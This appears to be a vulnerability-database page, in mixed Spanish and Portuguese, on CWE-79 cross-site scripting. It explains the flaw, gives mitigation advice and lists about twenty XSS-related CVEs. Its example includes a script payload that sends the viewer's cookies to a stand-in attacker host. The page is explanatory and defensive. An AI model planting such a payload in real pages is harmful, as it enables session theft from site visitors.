Fallos del tipo CWE-79

28.971 resultados

Injeção de Script entre Sites (XSS)

Ocorre quando uma aplicação web insere dados não validados ou não escapados diretamente em páginas HTML, permitindo que um atacante injete código JavaScript malicioso. Esse script é executado no navegador da vítima, roubando cookies, tokens de autenticação ou realizando ações em nome do usuário.

Ejemplo

Um site de comentários que exibe a entrada do usuário sem sanitização: se alguém escreve <script>fetch('http://atacante.com/?cookie='+document.cookie)</script> como comentário, o navegador de quem visualiza executa o script e envia seus cookies para o atacante.

Cómo mitigar

Sempre escapar (ou codificar em HTML) dados vindos do usuário antes de renderizar: use funções como htmlspecialchars() em PHP, textContent ao invés de innerHTML em JavaScript, ou use templates que escapam por padrão (como Jinja2, Vue com v-text). Implemente Content Security Policy (CSP) como camada adicional de defesa.

CVE-2022-38901MEDIUMA Cross-site scripting (XSS) vulnerability in the Document and Media module - file upload functionality in Liferay Digital Experience PlatfoEPSS 0.6%CVE-2026-47636MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2024-3614LOWSourceCodester Warehouse Management System customer.php cross site scriptingEPSS 0.6%CVE-2024-3616LOWSourceCodester Warehouse Management System pengguna.php cross site scriptingEPSS 0.6%CVE-2026-45465MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2024-7657MEDIUMGila CMS HTTP POST Request page cross site scriptingEPSS 0.6%CVE-2026-47639MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2024-34469HIGHRukovoditel before 3.5.3 allows XSS via user_photo to index.php?module=users/registration&action=save.EPSS 0.6%CVE-2026-45464MEDIUMMicrosoft SharePoint Server Spoofing VulnerabilityEPSS 0.6%CVE-2022-1059HIGHCROSS-SITE SCRIPTING CWE-79EPSS 0.6%CVE-2022-39295MEDIUMImproper Neutralization of Alternate XSS Syntax in Knowage-ServerEPSS 0.6%CVE-2022-1717—Custom Share Buttons with Floating Sidebar < 4.2 - Admin+ Stored XSSEPSS 0.6%CVE-2022-1889—Newsletter < 7.4.6 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-1327—Image Gallery - Grid Gallery < 1.1.6 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-1568—Team Members < 5.1.1 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-2148—LinkedIn Company Updates <= 1.5.3 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2021-25066—Ninja Forms < 3.6.10 - Admin+ Stored Cross-Site Scripting via ImportEPSS 0.6%CVE-2022-1326—Form - Contact Form <= 1.2.0 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-1275—BannerMan <= 0.2.4 - Multiple Admin+ Stored Cross-Site ScriptingEPSS 0.6%CVE-2022-2169—Loading Page with Loading Screen < 1.0.83 - Admin+ Stored Cross-Site ScriptingEPSS 0.6%